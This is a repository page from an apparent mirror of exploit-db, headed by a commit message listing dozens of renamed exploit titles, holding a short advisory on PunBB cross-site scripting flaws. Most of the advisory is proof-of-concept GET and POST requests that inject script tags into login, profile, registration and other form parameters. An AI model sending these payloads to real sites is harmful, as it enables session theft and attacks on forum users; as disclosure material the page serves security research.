bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/36137.txt
Offensive Security c27aa131c8 DB: 2016-11-15 
5 new exploits

MyServer 0.8.11 - (204 No Content) error Remote Denial of Service
MyServer 0.8.11 - '204 No Content' error Remote Denial of Service

Microsoft Internet Explorer 11 MSHTML - CMap­Element::Notify Use-After-Free (MS15-009)

Microsoft Internet Explorer 9-11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)
Microsoft Internet Explorer 9<11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)

MySQL 4.0.17 - UDF Dynamic Library Exploit
MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (1)

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Privilege Escalation
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (2)

Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit
Solaris 8 / 9 - '/usr/ucb/ps' Local Information Leak Exploit

Solaris 10 (libnspr) - Arbitrary File Creation Privilege Escalation
Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)

Solaris 10 (libnspr) - LD_PRELOAD Arbitrary File Creation Privilege Escalation
Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)

Solaris 10 (libnspr) - Constructor Privilege Escalation
Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)

IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug
IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug

Apple MacOS 10.12 - 'task_t' Privilege Escalation
Apple macOS 10.12 - 'task_t' Privilege Escalation

Linux Kernel 2.6.x < 2.6.7-rc3 - 'sys_chown()' Privilege Escalation
Solaris 8/9 ps - Environment Variable Information Leak
Solaris 7/8/9 CDE libDtHelp - Buffer Overflow dtprintinfo Privilege Escalation
Solaris 7/8/9 CDE libDtHelp - Buffer Overflow Non-Exec Stack Privilege Escalation
Solaris 8/9 passwd(1) - 'circ()' Stack-Based Buffer Overflow Privilege Escalation
Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)

Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - /bin/login Buffer Overflow
Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Buffer Overflow

Oracle 9i / 10g (extproc) - Local+Remote Command Execution
Oracle 9i / 10g (extproc) - Local / Remote Command Execution

Solaris/SPARC 2.5.1/2.6/7/8 - Derived 'login' Buffer Overflow

Microsoft Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)
Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)
Disk Pulse Enterprise - Login Buffer Overflow' (Metasploit)

MiniNuke 1.8.2 - (news.asp hid) SQL Injection
MiniNuke 1.8.2 - 'hid' Parameter SQL Injection

MiniNuke 1.8.2b - (pages.asp) SQL Injection
MiniNuke 1.8.2b - 'pages.asp' SQL Injection

MiniNuke 2.x - (create an admin) SQL Injection
MiniNuke 2.x - SQL Injection (Add Admin)

Nukedit CMS 4.9.6 - Unauthorized Admin Add Exploit
Nukedit CMS 4.9.6 - Unauthorized Admin Add

Portail Web PHP 2.5.1 - (includes.php) Remote File Inclusion
Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion
CodeBreak 1.1.2 - (codebreak.php) Remote File Inclusion
Mambo Module Weather - 'absolute_path' Remote File Inclusion
CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion
Mambo Module Weather - 'absolute_path' Parameter Remote File Inclusion

mxBB Module MX Shotcast 1.0 RC2 - (getinfo1.php) Remote File Inclusion
mxBB Module MX Shotcast 1.0 RC2 - 'getinfo1.php' Remote File Inclusion

RicarGBooK 1.2.1 - (header.php lang) Local File Inclusion
RicarGBooK 1.2.1 - 'lang' Parameter Local File Inclusion

BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection
BlogPHP 2 - 'id' Parameter Cross-Site Scripting / SQL Injection
MultiCart 2.0 - (productdetails.php) SQL Injection
PHP-Nuke Modules Manuales 0.1 - 'cid' SQL Injection
PHP-Nuke Module Siir - 'id' SQL Injection
MultiCart 2.0 - 'productdetails.php' SQL Injection
PHP-Nuke Modules Manuales 0.1 - 'cid' Parameter SQL Injection
PHP-Nuke Module Siir - 'id' Parameter SQL Injection
OSSIM 0.9.9rc5 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
PHP-Nuke Module NukeC 2.1 - (id_catg) SQL Injection
OSSIM 0.9.9rc5 - Cross-Site Scripting / SQL Injection
PHP-Nuke Module NukeC 2.1 - 'id_catg' Parameter SQL Injection

PHPProfiles 4.5.2 Beta - (body_comm.inc.php) Remote File Inclusion
PHPProfiles 4.5.2 Beta - 'body_comm.inc.php' Remote File Inclusion
PHPUserBase 1.3b - (unverified.inc.php) Local File Inclusion
PHPUserBase 1.3b - (unverified.inc.php) Remote File Inclusion
PHPUserBase 1.3b - 'unverified.inc.php' Local File Inclusion
PHPUserBase 1.3b - 'unverified.inc.php' Remote File Inclusion
PHP-Nuke Module Kose_Yazilari - (artid) SQL Injection
MiniNuke 2.1 - (members.asp uid) SQL Injection
PHP-Nuke Module Kose_Yazilari - 'artid' Parameter SQL Injection
MiniNuke 2.1 - 'uid' Parameter SQL Injection
Nukedit 4.9.x - Remote Create Admin Exploit
WordPress Plugin Sniplets 1.1.2 - (Remote File Inclusion / Cross-Site Scripting / Remote Code Execution) Multiple Vulnerabilities
Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection
Nukedit 4.9.x - Remote Create Admin
WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution
Mambo Component SimpleBoard 1.0.3 - 'catid' Parameter SQL Injection
GROUP-E 1.6.41 - (head_auth.php) Remote File Inclusion
Koobi Pro 5.7 - (categ) SQL Injection
GROUP-E 1.6.41 - 'head_auth.php' Remote File Inclusion
Dream4 Koobi Pro 5.7 - 'categ' Parameter SQL Injection
barryvan compo manager 0.5pre-1 - Remote File Inclusion
PHP-Nuke My_eGallery 2.7.9 - SQL Injection
Centreon 1.4.2.3 - (get_image.php) Remote File Disclosure
Koobi CMS 4.3.0 < 4.2.3 - (categ) SQL Injection
Barryvan Compo Manager 0.3 - Remote File Inclusion
PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection
Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure
Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' Parameter SQL Injection
Koobi Pro 6.25 - links SQL Injection
Koobi Pro 6.25 - shop SQL Injection
Koobi Pro 6.25 - gallery SQL Injection
Koobi Pro 6.25 - showimages SQL Injection
Koobi 4.4/5.4 - gallery SQL Injection
Dream4 Koobi Pro 6.25 Links - 'categ' Parameter SQL Injection
Dream4 Koobi Pro 6.25 Shop - 'categ' Parameter SQL Injection
Dream4 Koobi Pro 6.25 Gallery - 'galid' Parameter SQL Injection
Dream4 Koobi Pro 6.25 Showimages - 'galid' Parameter SQL Injection
Dream4 Koobi 4.4/5.4 - gallery SQL Injection
Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections
Koobi Pro 6.25 - poll SQL Injection
Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections
Dream4 Koobi Pro 6.25 Poll - 'poll_id' Parameter SQL Injection

Podcast Generator 1.2 - GLOBALS[] Multiple Vulnerabilities
Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities

DBHCMS Web Content Management System 1.1.4 - Remote File Inclusion
DBHcms 1.1.4 - Remote File Inclusion

Koobi Pro 6.1 - Gallery (img_id)
Dream4 Koobi Pro 6.1 Gallery - 'img_id' Parameter SQL Injection

dbhcms 1.1.4 - Persistent Cross-Site Scripting
DBHcms 1.1.4 - Persistent Cross-Site Scripting

DBHcms 1.1.4 (dbhcms_user and SearchString) - SQL Injection
DBHcms 1.1.4 - 'dbhcms_user/SearchString' Parameter SQL Injection

podcast generator 1.3 - Multiple Vulnerabilities
Podcast Generator 1.3 - Multiple Vulnerabilities

PHP Download Manager 1.1.x - files.php SQL Injection
PHP Download Manager 1.1.x - 'files.php' SQL Injection

Koobi 5.0 - BBCode URL Tag Script Injection
Dream4 Koobi 5.0 - BBCode URL Tag Script Injection

Koobi Pro 5.6 - showtopic Module toid Parameter Cross-Site Scripting
Koobi Pro 5.6 - showtopic Module toid Parameter SQL Injection
Dream4 Koobi Pro 5.6 - 'showtopic' Parameter SQL Injection
Portail Web PHP 2.5.1 - config/conf-activation.php site_path Parameter Remote File Inclusion
Portail Web PHP 2.5.1 - menu/item.php site_path Parameter Remote File Inclusion
Portail Web PHP 2.5.1 - modules/conf_modules.php site_path Parameter Remote File Inclusion
Portail Web PHP 2.5.1 - system/login.php site_path Parameter Remote File Inclusion
Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion

Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting

Barryvan Compo Manager 0.3 - 'main.php' Remote File Inclusion

Centreon 1.4.2 - color_picker.php Multiple Cross-Site Scripting Vulnerabilities

DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion
DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion

Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution
2016-11-15 05:01:20 +00:00

36 lines
2.6 KiB
Text
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/49660/info
PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
GET
/login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
GET
/misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>
POST /delete.php?id=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_confirm=>"&#039;><script>alert(oink)</script>&delete=>"&#039;><script>alert(oink)</
script>
POST /edit.php?id=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_message=>"&#039;><script>alert(oink)</script>&submit=>"&#039;><script>alert(oink)</
script>
POST /login.php?action=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_email=>"&#039;><script>alert(oink)</script>&request_pass=>"&#039;><script>alert(oin
k)</script>
POST /misc.php?email=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&redirect_url=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_subject=>"&#039;><script>alert(o
ink)</script>&req_message=>"&#039;><script>alert(oink)</script>&submit=>"&#039;><script>alert(oink)</script>
POST
/profile.php?action=>"&#039;><script>alert(oink)</script>&id=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_old_password=>"&#039;><script>alert(oink)</script>&req_new_password1=>"&#039;><scri
pt>alert(oink)</script>&req_new_password2=>"&#039;><script>alert(oink)</script>&update=>"&#039;><script>alert(oink)</script>
POST /register.php?action=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_username=>"&#039;><script>alert(oink)</script>&req_password1=>"&#039;><script>alert
(oink)</script>&req_password2=>"&#039;><script>alert(369448)</script>&req_email1=>"&#039;><script>alert(oink)</script>&timezone=>"&#039;><script>alert(oink)</script>&register=>"&#039;>
<script>alert(oink)</script>
Reference in a new issue View git blame Copy permalink